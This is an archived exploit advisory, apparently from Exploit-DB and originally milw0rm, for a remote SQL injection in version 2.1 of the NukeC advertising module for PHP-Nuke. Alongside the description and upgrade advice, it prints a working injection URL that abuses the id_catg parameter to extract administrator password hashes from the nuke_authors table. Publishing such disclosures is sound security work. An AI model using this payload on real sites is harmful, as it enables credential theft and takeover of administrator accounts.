PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection

vendor:

NukeC

by:

DamaR

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: NukeC

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP-Nuke 6.5

2008

PHP-NUKE Modules NukeC Module’s Version: 2.1 Remote SQL Injection

A remote SQL injection vulnerability exists in NukeC Module's Version 2.1 for PHP-Nuke. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the underlying database server via the 'id_catg' parameter in the 'modules.php' script.

Mitigation:

Upgrade to the latest version of NukeC Module.

Source

Exploit-DB raw data:

=-==-==-==-==-==-==-==D==A==M==A==R==-==-==-==-==-==-==-==-==-==-==-=

PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection

###################################################################################

 

Found: DamaR
contact: By.DamaR@Hotmail.Com

Hack Bitti ama DÃ¶nmek YakÄ±n  Since 2000

iÃ§in yaklaÅŸÄ±k 9.080 sonuÃ§tan 1 - 10 arasÄ± sonuÃ§lar (0,17 saniye)


###################################################################################

Exploit:

/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2

###################################################################################


Module Copyright Â© Information
NukeC module for PHP-Nuke


 Module's Name: NukeC
 Module's Version: 2.1
 Module's Description: NukeC - The Advanced Advertising System for PHP-Nuke.
NukeC Addon Module is addon module built for work on PHP-Nuke, the great web portal system.
NukeC is an advertising system that allows website visitors or members to sell something by posting the information about the item that they want to sell. With the admin sections, you could easily manage all of contents and preferences in NukeC Modules eventhough you are not a PHP programmer.
NukeC 2.1 is only work on PHP-Nuke 6.5. Please Download 2.0 or earlier for PHP-Nuke 6.0 or earlier nuke version
 License: GNU/GPL
 Author's Name: Sudirman Angriawan
 Author's Email: nukecpower@yahoo.com


###################################################################################

# milw0rm.com [2008-02-21]